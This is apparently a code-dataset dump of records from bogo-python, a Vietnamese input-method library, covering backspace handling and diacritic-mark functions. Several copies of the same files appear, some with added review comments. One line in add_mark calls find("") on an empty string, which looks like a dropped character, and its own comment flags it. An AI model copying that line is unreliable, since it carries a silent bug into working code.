    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)

    if _mark or _accent:
        # The deleted character carries a mark or accent, so it was built
        # from several raw keystrokes. Walk backwards to find where the
        # trailing run of IM keys (plus plain vowels and 'd') begins.
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                i += 1
                break
            i -= 1
        # NOTE(review): if the whole raw_sequence consists of IM keys the
        # loop exits with i == -1, so the slices below start from the
        # *last* character only; i == 0 looks intended -- confirm.

        # Starting from that whole trailing run, shrink it from the left
        # until a suffix converts exactly to the deleted character, then
        # cut that suffix off.
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # Plain character: remove its last occurrence from raw_sequence.
        # Guard against rfind() returning -1, which previously produced
        # raw_sequence[:-1] + raw_sequence[0:] -- a corrupted, longer
        # sequence -- instead of leaving the sequence unchanged.
        index = raw_sequence.rfind(deleted_char)
        if index != -1:
            raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | handle_backspace | python | def handle_backspace(converted_string, raw_sequence, im_rules=None):
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence | Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence(). | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L492-L545 | [
"def process_sequence(sequence,\n rules=None,\n skip_non_vietnamese=True):\n \"\"\"\\\n Convert a key sequence into a Vietnamese string with diacritical marks.\n\n Args:\n rules (optional): see docstring for process_key().\n skip_non_vietnamese (optiona... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
|
BoGoEngine/bogo-python | bogo/mark.py | get_mark_char | python | def get_mark_char(char):
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE | Get the mark of a single char, if any. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L50-L65 | [
"def remove_accent_char(char):\n \"\"\"\n Remove accent from a single char, if any.\n \"\"\"\n return add_accent_char(char, Accent.NONE)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_at(string, index, mark):
"""
Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:]
def add_mark_char(char, mark):
"""
Add mark to a single char.
"""
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case)
def is_valid_mark(comps, mark_trans):
"""
Check whether the mark given by mark_trans is valid to add to the components
"""
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | add_mark_at | python | def add_mark_at(string, index, mark):
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:] | Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0 | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L100-L108 | [
"def add_mark_char(char, mark):\n \"\"\"\n Add mark to a single char.\n \"\"\"\n if char == \"\":\n return \"\"\n case = char.isupper()\n ac = accent.get_accent_char(char)\n char = accent.add_accent_char(char.lower(), Accent.NONE)\n new_char = char\n if mark == Mark.HAT:\n i... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
"""
Get the mark of a single char, if any.
"""
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_char(char, mark):
"""
Add mark to a single char.
"""
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case)
def is_valid_mark(comps, mark_trans):
"""
Check whether the mark given by mark_trans is valid to add to the components
"""
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | add_mark_char | python | def add_mark_char(char, mark):
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case) | Add mark to a single char. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L111-L152 | [
"def get_accent_char(char):\n \"\"\"\n Get the accent of an single char, if any.\n \"\"\"\n index = utils.VOWELS.find(char.lower())\n if (index != -1):\n return 5 - index % 6\n else:\n return Accent.NONE\n",
"def add_accent_char(char, accent):\n \"\"\"\n Add accent to a singl... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
    """
    Return the Mark constant carried by a single character.

    The accent (tone) is stripped first so only the base letter is
    inspected; an empty result or an unmarked letter yields Mark.NONE.
    """
    bare = accent.remove_accent_char(char.lower())
    if not bare:
        return Mark.NONE
    for mark, marked_letters in ((Mark.BAR, "đ"),
                                 (Mark.BREVE, "ă"),
                                 (Mark.HORN, "ơư"),
                                 (Mark.HAT, "âêô")):
        if bare in marked_letters:
            return mark
    return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
    """
    Apply ``mark`` to a (initial consonant, vowel, final consonant) triple.

    Returns a new 3-element list; ``components`` itself is not mutated
    (a shallow copy is taken first).
    """
    comp = list(components)
    if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
        # BAR only ever applies to a trailing d of the initial consonant.
        comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
    else:
        # Remove all marks and accents in the vowel part so the positional
        # lookups below see plain base vowels.
        raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
        raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
        if mark == Mark.HAT:
            pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
                      raw_vowel.find("e"))
            comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
        elif mark == Mark.BREVE:
            if raw_vowel != "ua":
                comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
        elif mark == Mark.HORN:
            if raw_vowel in ("uo", "uoi", "uou"):
                # Horn both of the first two vowel letters (ươ, ươi, ươu).
                comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
            elif raw_vowel == "oa":
                comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
            else:
                # NOTE(review): str.find("") always returns 0, so pos is
                # effectively max(0, position of 'o').  The empty literal
                # looks like a dropped character (likely "u"); confirm
                # against the upstream source before changing.
                pos = max(raw_vowel.find(""), raw_vowel.find("o"))
                comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
        if mark == Mark.NONE:
            # Removing marks: restore the stripped vowel, or undo a bared d
            # when the vowel was already mark-free.
            if not raw_vowel == comp[1].lower():
                comp[1] = raw_vowel
            elif comp[0] and comp[0][-1] == "đ":
                comp[0] = comp[0][:-1] + "d"
    return comp
def add_mark_at(string, index, mark):
    """
    Return ``string`` with ``mark`` applied to the character at ``index``.

    An index of -1 (str.find's "not found" value) returns the string
    unchanged.
    """
    if index == -1:
        return string
    head, target, tail = string[:index], string[index], string[index + 1:]
    return head + add_mark_char(target, mark) + tail
def is_valid_mark(comps, mark_trans):
    """
    Tell whether the mark transformation ``mark_trans`` can be applied
    to the given components.
    """
    if mark_trans == "*_":
        return True
    components = list(comps)
